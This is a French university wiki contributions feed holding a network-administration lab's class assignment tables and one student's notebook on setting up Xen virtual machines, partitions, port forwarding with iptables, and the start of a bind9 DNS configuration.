<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
	<id>https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tmerien</id>
	<title>wiki-se.plil.fr - Contributions [fr]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki-se.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tmerien"/>
	<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php/Sp%C3%A9cial:Contributions/Tmerien"/>
	<updated>2026-05-14T03:34:53Z</updated>
	<subtitle>Contributions</subtitle>
	<generator>MediaWiki 1.39.1</generator>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12747</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12747"/>
		<updated>2026-03-03T20:41:40Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
!numéro de binôme&lt;br /&gt;
!Adresse IPV4 OpenWRT&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|1&lt;br /&gt;
|193.48.57.177&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|3&lt;br /&gt;
|193.48.57.180&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|4&lt;br /&gt;
|193.48.57.178&lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|5&lt;br /&gt;
|193.48.57.181&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|7&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|6&lt;br /&gt;
|193.48.57.179&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| 193.48.57.167|| Mohamed Salhi &lt;br /&gt;
|2&lt;br /&gt;
|193.48.57.173&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|Styx&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1-Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2-Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E5-Cedric&lt;br /&gt;
|15&lt;br /&gt;
|-&lt;br /&gt;
|E6-Thomas&lt;br /&gt;
|16&lt;br /&gt;
|-&lt;br /&gt;
|E9-Aurele&lt;br /&gt;
|19&lt;br /&gt;
|-&lt;br /&gt;
|E10-Tom&lt;br /&gt;
|20&lt;br /&gt;
|-&lt;br /&gt;
|E13-Billel&lt;br /&gt;
|23&lt;br /&gt;
|-&lt;br /&gt;
|E14-Antonin&lt;br /&gt;
|24&lt;br /&gt;
|-&lt;br /&gt;
|E15-MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|-&lt;br /&gt;
|E11-Evora&lt;br /&gt;
|28&lt;br /&gt;
|-&lt;br /&gt;
|E12-Gauthier&lt;br /&gt;
|21&lt;br /&gt;
|-&lt;br /&gt;
|E8-Yassine&lt;br /&gt;
|18&lt;br /&gt;
|-&lt;br /&gt;
|E7-Ibrahim&lt;br /&gt;
|17&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolPierre || &amp;lt;code&amp;gt;10.60.1.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a1::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolAgathe || &amp;lt;code&amp;gt;10.60.2.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a2::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|PoolCedric&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.5.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a5::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolThomas&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.6.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a6::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolBillel&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.13.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60ad::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolAurele&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.9.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a9::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolTom&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.10.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60aa::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolSalhi&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.15.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60b1::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolAntonin&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.14.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60ae::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolYassine&lt;br /&gt;
|10.60.8.0/24&lt;br /&gt;
|2001:660:4401:60a8::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolEvora&lt;br /&gt;
|10.60.11.0/24&lt;br /&gt;
|2001:660:4401:60ab::/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12455</id>
		<title>Atelier SysRes SE4 2025/2026 E10</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E10&amp;diff=12455"/>
		<updated>2026-02-26T17:38:16Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Partionnage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Informations utiles ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Machine&lt;br /&gt;
!Nom&lt;br /&gt;
!Site web&lt;br /&gt;
!IPv4 publique&lt;br /&gt;
|-&lt;br /&gt;
|Ma machine de service&lt;br /&gt;
|TomPere2&lt;br /&gt;
|tompere2.xyz&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine de service d'Aurèle&lt;br /&gt;
|TomPere1&lt;br /&gt;
|tompere.online&lt;br /&gt;
|''NA''&lt;br /&gt;
|-&lt;br /&gt;
|Machine mandataire&lt;br /&gt;
|TomPere0&lt;br /&gt;
|''NA''&lt;br /&gt;
|193.48.57.168&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
=== Créer ses  VMs ===&lt;br /&gt;
&lt;br /&gt;
==== Prérequis ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous devons nous connecter à ''CapBreton'' pour pouvoir y créer nos machines virtuelles.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@capbreton&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, nous utiliserons l'hyperviseur de machine virtuelle Xen pour créer nos VMs.&lt;br /&gt;
&lt;br /&gt;
==== Création ====&lt;br /&gt;
&lt;br /&gt;
Voici la commande permettant de créer ma machine de service. &amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4-TomPere2 --dhcp --bridge=pont_pere --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2048M --force&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant que nous avons une machine virtuelle créer, il faut la démarrer et s'y connecter ! C'est ce que permettent les deux commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4-TomPere2.cfg&lt;br /&gt;
xen console SE4-TomPere2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Vérification ====&lt;br /&gt;
Remarque : On peut vérifier que '''les machines virtuelles en cours d’exécution''' grâce à &amp;lt;code&amp;gt;xen list&amp;lt;/code&amp;gt; .&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@capbreton:/var# xen list | grep Tom&lt;br /&gt;
SE4-Tompere1                               389  2048     1     -b----    3574.5&lt;br /&gt;
SE4-Tompere2                               390  2048     1     -b----    3343.2&lt;br /&gt;
SE4-Tompere0                               399  2048     1     -b----    8849.0&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Comme on le voit,  nos 3 machines sont démarrées !&lt;br /&gt;
&lt;br /&gt;
=== Partionnage ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration ====&lt;br /&gt;
On ajoute dans le fichier &amp;lt;code&amp;gt;/etc/xen/SE4-Tompere2.cfg&amp;lt;/code&amp;gt; nos partitions '''home''' et '''var'''.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
    root        = '/dev/xvda2 ro'&lt;br /&gt;
    disk        = [&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/disk.img,xvda2,w',&lt;br /&gt;
                    'file:/usr/local/xen/domains/SE4-Tompere2/swap.img,xvda1,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-home,xvda3,w',&lt;br /&gt;
                    'phy:/dev/virtual/Tompere2-var,xvdb1,w',&lt;br /&gt;
                ]&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Montage des partitions ====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvdb1 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le montage des partitions est fait ! On peut par ailleurs le voir via &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;. Cependant, au redémarrage de la VM, les partitions ne seront pas automatiquement montées. Ainsi, il faut modifier le fichier &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
proc            /proc           proc    defaults        0       0&lt;br /&gt;
devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, nos partitions '''var''' et '''home''' seront bien montés comme il se doit au démarrage.&lt;br /&gt;
&lt;br /&gt;
== Configuration réseau ==&lt;br /&gt;
Ajouter une configuration réseau à nos machines virtuelles est essentiel pour accéder à Internet et pour pouvoir utiliser SSH sur nos machines depuis l'extérieur. C'est ce que nous allons voir dans cette partie.&lt;br /&gt;
&lt;br /&gt;
=== Ping entre les deux machines de services ===&lt;br /&gt;
Comme premier jalon, intéressons nous à la façon de relier nos machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons d'abord modifier les fichiers &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Sur ma machine de services TomPere2 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto eth0&lt;br /&gt;
	iface eth0 inet static&lt;br /&gt;
		address 192.168.0.3&lt;br /&gt;
		netmask 255.255.255.0&lt;br /&gt;
		gateway 192.168.0.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et sur la machine mandataire TomPere0 :&amp;lt;syntaxhighlight lang=&amp;quot;vim&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.0.1&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.168&lt;br /&gt;
    netmask 255.255.255.224&lt;br /&gt;
    gateway 193.48.57.162&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après un &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; puis &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt; pour charger les modifications apportées, cette configuration nous a permis de voir l'adresse IPV4 correspondante à &amp;lt;code&amp;gt;eth0&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;ip address&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
De ce fait, nous avons pu '''ping''' d'une machine à l'autre via le commutateur virtuel.&lt;br /&gt;
&lt;br /&gt;
==== Résultat ====&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+IPs de TomPere1&lt;br /&gt;
!TomPere1&lt;br /&gt;
!IPs&lt;br /&gt;
|-&lt;br /&gt;
|IPv4&lt;br /&gt;
|192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
|IPv6&lt;br /&gt;
|2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
|}&lt;br /&gt;
Nous pouvons voir dans le tableau ci-dessus les '''IPs de la machine de service TomPere1''', ce qui nous permettra de '''tester la connexion avec l'utilitaire ping'''.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 192.168.0.2&lt;br /&gt;
PING 192.168.0.2 (192.168.0.2) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=1 ttl=64 time=0.236 ms&lt;br /&gt;
64 bytes from 192.168.0.2: icmp_seq=2 ttl=64 time=0.459 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ping 2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
PING 2001:660:4401:60a0:216:3eff:fe4b:1909 (2001:660:4401:60a0:216:3eff:fe4b:1909) 56 data bytes&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=1 ttl=64 time=0.293 ms&lt;br /&gt;
64 bytes from 2001:660:4401:60a0:216:3eff:fe4b:1909: icmp_seq=2 ttl=64 time=0.249 ms&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;TomPere 2 reçoit bien une réponse !&lt;br /&gt;
&lt;br /&gt;
=== SSH depuis l'extérieur ===&lt;br /&gt;
Pour pouvoir se SSH depuis l'extérieur, il faut commencer par activer l'option sur les machines.&lt;br /&gt;
&lt;br /&gt;
Pour cela, rien de plus simple, il faut aller dans le fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; des VMs et activer la directive &amp;lt;code&amp;gt;PermitRootLogin&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Désormais, l'accès de root à distance est autorisé. On peut donc se '''ssh de TomPere2 vers TomPere1 et inversement''' !&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
root@SE4-Tompere2:~# ssh root@2001:660:4401:60a0:216:3eff:fe4b:1909&lt;br /&gt;
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;C'est pratique, mais ce n'est pas encore ce que l'on veut.&lt;br /&gt;
&lt;br /&gt;
Nous voulons pouvoir se SSH depuis l'extérieur. L'idée va être de dire à la machine mandataire de rediriger certains ports que l'on choisit, vers les machines de services.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, nous appliquerons la redirection suivante :&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+&lt;br /&gt;
!Nom de la VM&lt;br /&gt;
!Port de redirection associé&lt;br /&gt;
|-&lt;br /&gt;
|TomPere1&lt;br /&gt;
|2201&lt;br /&gt;
|-&lt;br /&gt;
|TomPere2&lt;br /&gt;
|2202&lt;br /&gt;
|}&lt;br /&gt;
Dans le fichier &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;shell&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Ensuite, on met à jour la modification grâce à &amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
sysctl -p&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Redirection des ports :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2201 -j DNAT --to-destination 192.168.0.2:22&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.0.3:22&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Pour que les machines internes puissent sortir sur Internet via l’adresse publique de la mandataire, nous avons appliqué une mascarade :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Grâce à cette configuration nous pouvons nous connecter sur les machines de services en SSH depuis l'extérieur, via les commandes suivantes :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
ssh root@193.48.57.168 -p2201&lt;br /&gt;
ssh root@193.48.57.168 -p2202&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Super ! L'objectif est atteint. &lt;br /&gt;
&lt;br /&gt;
Remarque : Si on veut que cette configuration reste, il faudra par contre installer le paquet &amp;lt;code&amp;gt;iptables-persistent&amp;lt;/code&amp;gt; et effectuer la sauvegarde.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
apt install iptables-persistent&lt;br /&gt;
netfilter-persistent save&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== DNS/DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
=== Prérequis ===&lt;br /&gt;
Nous devons configurer un serveur DNS, qui associe '''tompere.online''' et '''tompere2.xyz''', aux machines de services.&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, nous avons commencé par louer ces noms de domaine. sur Gandi.&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons pu télécharger les clés qui seront utiles plus tard pour configurer le DNSSEC.&lt;br /&gt;
&lt;br /&gt;
* '''.key''' : la clé privée du domaine&lt;br /&gt;
&lt;br /&gt;
* '''.csr''' : la demande de signature du certificat&lt;br /&gt;
&lt;br /&gt;
=== Configuration du paquetage bind9 ===&lt;br /&gt;
Il faut installer le paquetage &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; avec &amp;lt;code&amp;gt;apt&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut configurer un fichier de zone : &amp;lt;code&amp;gt;/etc/bind/zones/tompere2_xyz/tompere2.xyz&amp;lt;/code&amp;gt;.&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
